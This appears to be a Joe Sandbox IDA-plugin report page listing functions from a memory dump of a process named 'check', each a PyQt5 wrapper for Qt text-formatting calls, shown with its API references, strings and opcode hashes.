Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextBlockFormat$setMarker$setMarker(self, marker: QTextBlockFormat.MarkerType)
API String ID: 3865857979-509391100
Opcode ID: 3f756f77bb9e9d64ddbce3de738403f2ece69ad6c7bbeabd91bc8a810eb9450d
Instruction ID: eeb4fc300c68b22fc45deabd3621c57d841308e74e3f7989ccac319773ddd74b
Opcode Fuzzy Hash: 3f756f77bb9e9d64ddbce3de738403f2ece69ad6c7bbeabd91bc8a810eb9450d
Instruction Fuzzy Hash: CB213EB5A18F4AD1EB20CF25E88869933B8FB89784F904176CA8D43724DF3DD549C740

Function 00007FFB9A31B980 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@H@Z.QT5CORE ref: 00007FFB9A31B9EF
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFB9A31BA02
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFB9A31BA0D

Strings

setStyle, xrefs: 00007FFB9A31BA44
QTextListFormat, xrefs: 00007FFB9A31BA4B
setStyle(self, astyle: QTextListFormat.Style), xrefs: 00007FFB9A31BA35

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextListFormat$setStyle$setStyle(self, astyle: QTextListFormat.Style)
API String ID: 3865857979-247596590
Opcode ID: 471781f2870a4d28bdee5f554e79e13f21674235327b6f9a006b0c0fc60e2078
Instruction ID: d510fa2cfa807b0135c6fc4a0edfbb5d7bb1d44621a13904cad909f71160edd2
Opcode Fuzzy Hash: 471781f2870a4d28bdee5f554e79e13f21674235327b6f9a006b0c0fc60e2078
Instruction Fuzzy Hash: A1214DB5A08F4AC1EB20CF25E8886A933B8FB88784F9041B6CA9D03724DF3DD549C740

Function 00007FFB9A2F3B40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 44COMMON

Download Yara Rule

APIs

?nextCursorPosition@QTextLayout@@QEBAHHW4CursorMode@1@@Z.QT5GUI ref: 00007FFB9A2F3BCA
PyLong_FromLong.PYTHON3 ref: 00007FFB9A2F3BD2

Strings

nextCursorPosition, xrefs: 00007FFB9A2F3BF3
QTextLayout, xrefs: 00007FFB9A2F3BFA
nextCursorPosition(self, oldPos: int, mode: QTextLayout.CursorMode = QTextLayout.SkipCharacters) -> int, xrefs: 00007FFB9A2F3BE7
Bi|E, xrefs: 00007FFB9A2F3B8D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Cursor$?nextFromLayout@@LongLong_Mode@1@@Position@Text
String ID: Bi|E$QTextLayout$nextCursorPosition$nextCursorPosition(self, oldPos: int, mode: QTextLayout.CursorMode = QTextLayout.SkipCharacters) -> int
API String ID: 2822426348-83290189
Opcode ID: 00fc2f67b0fc38ea88cabdcb9b32ba245c0b5a17e377f5dcc31c7ceb90e21b8e
Instruction ID: cd17c016e09220b8e5a0838914d47a1922f102e1a66b48e8443d794dcb1753e8
Opcode Fuzzy Hash: 00fc2f67b0fc38ea88cabdcb9b32ba245c0b5a17e377f5dcc31c7ceb90e21b8e
Instruction Fuzzy Hash: 6F210BB6B18B56D5EB60CF21E8883AD33A8FB48780F524176DAAC43720DF39D959C740

Function 00007FFB9A2E5C50 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 44COMMON

Download Yara Rule

APIs

?lastIndexOf@?$QVector@VQPoint@@@@QEBAHAEBVQPoint@@H@Z.QT5CORE ref: 00007FFB9A2E5CDF
PyLong_FromLong.PYTHON3 ref: 00007FFB9A2E5CE7

Strings

lastIndexOf(self, value: QPoint, from_: int = -1) -> int, xrefs: 00007FFB9A2E5CFC
QPolygon, xrefs: 00007FFB9A2E5D0F
lastIndexOf, xrefs: 00007FFB9A2E5D08
BJ9|i, xrefs: 00007FFB9A2E5CA9

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?lastFromIndexLongLong_Of@?$Point@@Point@@@@Vector@
String ID: BJ9|i$QPolygon$lastIndexOf$lastIndexOf(self, value: QPoint, from_: int = -1) -> int
API String ID: 72233166-1779171152
Opcode ID: cf56a6eb6d98bf8586f0c3fbf620f8512ee61f94ca1e7d2b537214403d002d32
Instruction ID: d9c96e51792752a087e4af51a0830c2ef9ddede2cfe4eea9f8f91ff3ade13b7b
Opcode Fuzzy Hash: cf56a6eb6d98bf8586f0c3fbf620f8512ee61f94ca1e7d2b537214403d002d32
Instruction Fuzzy Hash: 5421E8B6B18B56C5EB608F25E8883AD33A8FB49790F914176CAAD43360DF39D959C700

Function 00007FFB9A31BEA0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@H@Z.QT5CORE ref: 00007FFB9A31BF04
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFB9A31BF17
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFB9A31BF22

Strings

setIndent, xrefs: 00007FFB9A31BF59
QTextListFormat, xrefs: 00007FFB9A31BF60
setIndent(self, aindent: int), xrefs: 00007FFB9A31BF4A

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextListFormat$setIndent$setIndent(self, aindent: int)
API String ID: 3865857979-710005523
Opcode ID: 6b1b2598b4ac7f4a60d9972e120959c20390d7c61434238d4b8205b06ad799b2
Instruction ID: f5d3334e20ffe5466ee54ef37693003daeff94a88c6de69b55933305b3389d47
Opcode Fuzzy Hash: 6b1b2598b4ac7f4a60d9972e120959c20390d7c61434238d4b8205b06ad799b2
Instruction Fuzzy Hash: B421FCB5A08B4BD1EB20CF25E8886A937B8FB85784F914176DA8D43724DF3DD54AC740

Function 00007FFB9A2FFB40 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@N@Z.QT5CORE ref: 00007FFB9A2FFBA6
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFB9A2FFBB9
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFB9A2FFBC4

Strings

setBottomBorder, xrefs: 00007FFB9A2FFBFB
setBottomBorder(self, width: float), xrefs: 00007FFB9A2FFBEC
QTextTableCellFormat, xrefs: 00007FFB9A2FFC02

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextTableCellFormat$setBottomBorder$setBottomBorder(self, width: float)
API String ID: 3865857979-3835632495
Opcode ID: 4454c64604d2f7c9eb267be402be5fbc83bcbb9bd0191bfaaf388d7cc4881327
Instruction ID: f219e3b9ab75c170ee6d6307776c2ed7bdc80479a501820949107913fc9f3eb8
Opcode Fuzzy Hash: 4454c64604d2f7c9eb267be402be5fbc83bcbb9bd0191bfaaf388d7cc4881327
Instruction Fuzzy Hash: E9211AB5A08F4AD1EB20DF25E8882A933B8FB49B84FA14076CA4D43724DF3DD55AC740

Function 00007FFB9A313B40 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@N@Z.QT5CORE ref: 00007FFB9A313BA6
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFB9A313BB9
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFB9A313BC4

Strings

setTopMargin, xrefs: 00007FFB9A313BFB
QTextFrameFormat, xrefs: 00007FFB9A313C02
setTopMargin(self, amargin: float), xrefs: 00007FFB9A313BEC

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextFrameFormat$setTopMargin$setTopMargin(self, amargin: float)
API String ID: 3865857979-958840985
Opcode ID: 304f8a3cb907637c5a33df3487d1b64136dc6e54b89c2963264f1607c25dd06f
Instruction ID: 54aa53c5738feb4460843193257fd74378dad4b14bb883412f08dd9470e73d62
Opcode Fuzzy Hash: 304f8a3cb907637c5a33df3487d1b64136dc6e54b89c2963264f1607c25dd06f
Instruction Fuzzy Hash: B4211AB5A08F4AD1EB20CF25E8882A933B8FB55784FA14176CA8D43724DF3DD54AC740

Function 00007FFB9A30B8E0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@_N@Z.QT5CORE ref: 00007FFB9A30B945
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFB9A30B958
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFB9A30B963

Strings

QTextTableFormat, xrefs: 00007FFB9A30B9A1
setBorderCollapse, xrefs: 00007FFB9A30B99A
setBorderCollapse(self, borderCollapse: bool), xrefs: 00007FFB9A30B98B

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextTableFormat$setBorderCollapse$setBorderCollapse(self, borderCollapse: bool)
API String ID: 3865857979-3247476430
Opcode ID: 0937f7819fd28e604497c2c8badfe4f3cecfe1ebe1bdb4a9a9e72c617fc1d7d2
Instruction ID: 8b0efbb65bff6c34ddae0ca351ed90a006734c2335a4fd1651e241582b8df73f
Opcode Fuzzy Hash: 0937f7819fd28e604497c2c8badfe4f3cecfe1ebe1bdb4a9a9e72c617fc1d7d2
Instruction Fuzzy Hash: A2212CB5A08B5BD1EB20CF21E8886A937B8FB45744F9540B6CA9D03724DF3DD54AC700

Function 00007FFB9A3258C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@H@Z.QT5CORE ref: 00007FFB9A325924
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFB9A325937
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFB9A325942

Strings

QTextBlockFormat, xrefs: 00007FFB9A325980
setHeadingLevel, xrefs: 00007FFB9A325979
setHeadingLevel(self, alevel: int), xrefs: 00007FFB9A32596A

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@Property@TextVariant@@@
String ID: QTextBlockFormat$setHeadingLevel$setHeadingLevel(self, alevel: int)
API String ID: 3865857979-2168793412
Opcode ID: c42df9bfd1ee7217c6657ea42c8a5d791ec7a0822a601180b03f42e06ece30dd
Instruction ID: af89eb34b930f351a0f9df303e616fbf5a4ddf156d1871c031abf35a0acd96ee
Opcode Fuzzy Hash: c42df9bfd1ee7217c6657ea42c8a5d791ec7a0822a601180b03f42e06ece30dd
Instruction Fuzzy Hash: 38215CB1A08B4BC1EB20CF21E8886A933B8FB49B84F904176CA8D43764CF3DD54AC740

Function 00007FFB9A32D8D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON

